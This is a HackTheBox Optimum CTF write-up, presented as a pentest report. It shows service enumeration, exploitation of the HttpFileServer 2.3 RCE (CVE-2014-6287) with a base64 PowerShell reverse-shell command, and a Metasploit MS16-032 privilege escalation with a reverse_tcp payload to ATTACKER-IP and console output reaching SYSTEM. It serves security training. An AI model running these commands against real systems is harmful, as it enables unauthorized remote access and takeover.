Optimum CTF Writeup
Table of Contents
ToggleThis is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Optimum CTF from HackTheBox. The writeup takes the form of a pentest report.
Optimum CTF
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This document shows the results of a security assessment performed on the Optimum machine (IP: 10.10.10.8). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.
Objective
The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.
Requirements
The assessment was conducted with the following requirements in mind:
- Exploit vulnerabilities to demonstrate potential impact.
- Assess the effectiveness of access controls and authentication mechanisms.
- Demonstrate privilege escalation from user-level to root.
- Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.
High-Level Summary
The assessment uncovered concerning vulnerabilities within the Optimum machine:
- CVE-2014-6287 (HttpFileServer RCE) - Severity: High
- Explanation: Remote Code Execution (RCE) vulnerability identified in HttpFileServer version 2.3.
- Recommendation: Update to the latest version of HttpFileServer to mitigate the risk.
- MS16-032 (Privilege Escalation) - Severity: Extreme
- Explanation: Privilege escalation vulnerability discovered, allowing potential unauthorized access.
- Recommendation: Apply the provided Microsoft patch to fix this critical vulnerability.
This high-level summary outlines the vulnerabilities found during the penetration test, along with their respective severity levels. It underscores the importance of promptly addressing and remedying these vulnerabilities to enhance overall system security.
Detailed Findings
Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in "Independent Challenge" section.
Methodology
Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:
Reconnaissance: The initial phase involved gathering information about open ports.
Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.
Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.
Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.
Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Independent Challenge - 10.10.10.8
export IP=10.10.10.8
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.8 | TCP: 80 |
Command: nmap -sC -sV -T4 -vv -p- 10.10.10.8
Initial Access - HttpFileServer 2.3 RCE
Vulnerability Explanation: The vulnerability was addressed as CVE-2014-6287
, a remote code execution (RCE) vulnerability in HttpFileServer version 2.3.
Vulnerability Fix: The vendor released an updated version of HttpFileServer that patches the RCE vulnerability. Upgrade to the latest version to mitigate the risk.
Severity: High
Steps to Reproduce the Attack:
- Download this public exploit.
- Go to revshells.com, select PowerShell #3 (Base64), change the IP address at the top to your VPN IP address, and copy the generated payload.
- Run the following command to obtain a foothold on the machine (replacing the string after the
-e
with your respective base64 encoded payload from revshells.com):python3 49125.py 10.10.10.8 80 "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOA
{abbreviated}
GwAbwBzAGUAKAApAA=="
Post-Exploitation
LPE to SYSTEM
Vulnerability Explanation: After generating a malicious Windows executable to establish a meterpreter session on the victim, Behind Security was able to successfully identify, by running windows exploit suggester (post/multi/recon/local_exploit_suggester
), that the machine is vulnerable to ms16-032
, a privilege escalation vulnerability.
Vulnerability Fix: Microsoft has issued a patch to fix this known issue. You can learn more about the patch and its details on Microsoft's official website.
Severity: Extreme
Steps to Reproduce the Attack: The attacker needs to have a meterpreter session on the machine.
- Background the meterpreter session using the command
bg
- Run:
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
- Configuration and output are provided below.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 192.168.1.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST ATTACKER-IP
LHOST => ATTACKER-IP
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on ATTACKER-IP:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2380
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $iD6g = [Ntdll]::NtImpersonateThread($mgn, $mgn, [ref]$p8yG)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (p8yG:VariablePath) [], Runtim
eException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $iD6g = [Advapi32]::DuplicateToken($iF, 2, [ref]$gYZ)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
iX7rWHCXEXxPf38Tph4mU5nNNfoW2lnc
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (ATTACKER-IP:4444 -> 10.10.10.8:49210) at 2023-08-12 11:13:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
[-] Already running as SYSTEM
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.